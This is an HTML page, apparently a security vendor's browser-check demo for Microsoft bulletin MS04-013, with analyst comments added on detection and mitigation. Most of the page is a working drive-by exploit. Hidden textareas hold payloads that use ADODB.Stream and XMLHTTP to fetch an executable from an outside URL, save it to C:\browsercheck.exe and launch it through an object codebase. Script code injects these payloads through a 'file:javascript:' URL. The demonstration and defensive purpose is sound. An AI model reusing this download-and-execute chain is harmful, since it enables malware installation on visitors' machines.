þÿ<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-16">
<title>ADODB Demo</title>
<!--
  Analyst notes (documentation only; markup and script tokens are unchanged).

  What this page is: by its own visible text, a demonstration exploit that
  tries to create and execute an .exe on the visitor's machine. It links to
  Microsoft bulletin MS04-013 as the vendor reference. The script uses
  Internet Explorer scripting features (ActiveXObject, createPopup,
  document.all), so it presumably only has an effect in an unpatched
  Internet Explorer on Windows. Confirm the affected versions against the
  bulletin.

  Encoding: the heading marks this as the UTF-16 variant of the demo and the
  meta element declares charset=utf-16. The two characters in front of the
  doctype are the bytes FE FF (a UTF-16 byte-order mark) shown as Latin-1
  text, most likely a conversion artifact of this copy. Practical point for
  defenders: a gateway or scanner that matches byte patterns must decode the
  declared or BOM-signalled encoding first, otherwise strings such as
  "ADODB.Stream" will not match in a UTF-16 document. Presumably that is what
  this variant is meant to check; verify with the demo's publisher.

  Structure: two payloads are stored as inert text in hidden textareas. They
  only run after the visitor clicks "Start demo", which calls doit().

  Things to look for when triaging a host or a proxy log, all taken from this
  page: the GET request issued by the first textarea, a browser-initiated
  write of the file path named in the first textarea, the local path named in
  the codebase attribute of the second textarea, and the literal URL prefix
  built in starten().

  Mitigation: install the update referenced by the MS04-013 link. Restricting
  ActiveX and active scripting for the Internet zone should also stop the
  script from instantiating the objects used here (verify in your
  environment).
-->
</head>
<body>
<H3>ADODB demo: UTF-16</H3>
<P>This demo exploit tries to create and execute the file C:\browsercheck.exe. See: <a href="http://www.microsoft.com/technet/security/Bulletin/MS04-013.mspx" target="_blank">MS04-013</a></P>
<!-- The only trigger on the page: a javascript: link that calls doit(). Nothing runs on load. -->
<P> <a href="javascript:doit()">Start demo</a> </P>
<!--
  Stage one payload, kept as hidden text (not executed here). When evaluated
  it opens an ADODB.Stream with Mode=3 and Type=1 (read/write and binary in
  ADO's enums), fetches the alert.exe URL with a synchronous Microsoft.XMLHTTP
  GET (third Open argument is 0), writes the response body into the stream and
  saves it to C:\browsercheck.exe with save option 2 (overwrite if present).
  The content stays on one line on purpose: it is data read through .value,
  so added line breaks or comments would become part of the payload text.
-->
<textarea id="code" style="display: none;"> s=new ActiveXObject("ADODB.Stream"); s.Mode=3; s.Type=1; s.Open(); x=new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET","http://www.heise.de/security/dienste/browsercheck/demos/ie/alert.exe",0); x.Send(); s.Write(x.responseBody); s.SaveToFile("C:\\browsercheck.exe",2); </textarea>
<!--
  Stage two payload, also hidden text. The &lt; and &gt; entities decode to
  angle brackets in the textarea value, so the evaluated code builds an
  object tag as a string, with a classid made only of the digit 1 (looks like
  a placeholder; confirm) and a codebase attribute that names a local .exe
  path. It then writes that markup into a window obtained from createPopup().
-->
<textarea id="code2" style="display: none;"> md="&lt;object id=\"oFile\""+ " classid=\"clsid:11111111-1111-1111-1111-111111111111\""+ " codebase=\"c:/windows/temp/browsercheck.exe\"&gt;&lt;/object&gt;"; w=createPopup(); w.document.clear(); w.document.write(md); </textarea>
<script language="javascript">
// Flattens a payload text (the value of one of the hidden textareas) into a
// single string that can be placed inside the single-quoted eval('...')
// expression assembled by starten().
//   code: the payload text.
//   returns: every line trimmed, escaped and followed by one space, joined.
// NOTE(review): result, lines, i and line are assigned without var, so they
// are created as globals.
function preparecode(code) {
  result = '';
  // Only CRLF is treated as a line separator.
  lines = code.split(/\r\n/);
  for (i=0;i<lines.length;i++) {
    line = lines[i];
    // Trim leading and trailing whitespace.
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    // Escape backslashes first so the escapes added below are not doubled.
    line = line.replace(/[\\]/g,"\\\\");
    // Escape both quote characters for the surrounding string literal.
    line = line.replace(/'/g,"\\'");
    line = line.replace(/"/g,"\\\"");
    // Every forward slash is replaced by its percent-encoded form.
    line = line.replace(/[/]/g,"%2f");
    // No CRLF can remain after the split above, so this replace changes nothing.
    line = line.replace(/\r\n/,"");
    line += ' ';
    // Always true: a space was appended on the previous statement.
    if (line != '') {
      result += line;
    }
  }
  return result;
}

// "weiter" is German for "continue". Opens the URL held in the global myURL
// (set by starten) in the window target "_search". Invoked by name from the
// setTimeout string in starten(), so it has to stay a global function.
function weiter() {
  open(myURL,"_search");
}

// "starten" is German for "start". Wraps one payload in a URL and opens it in
// two steps.
//   thecode: payload text taken from a hidden textarea.
// Side effects: sets the globals mycode and myURL, opens "http:///" in the
// "_search" target, then calls weiter() 500 ms later.
// Detection note: the literal prefix "file:javascript:" is unusual in
// ordinary pages, which makes it a candidate string for content inspection
// rules once the document's encoding has been decoded.
function starten(thecode) {
  mycode = preparecode(thecode);
  myURL = "file:javascript:eval('" + mycode + "')";
  open("http:///","_search");
  setTimeout("weiter()", 500);
}

// Entry point behind the "Start demo" link: starts stage one (textarea
// "code") and schedules stage two 600 ms later, that is 100 ms after the
// weiter() call queued for stage one.
function doit() {
  starten(document.all.code.value);
  setTimeout("doit2()", 600);
}

// Starts stage two (textarea "code2"). starten() overwrites the globals
// mycode and myURL that stage one used.
function doit2() {
  starten(document.all.code2.value);
}
</script>
</body>
</html>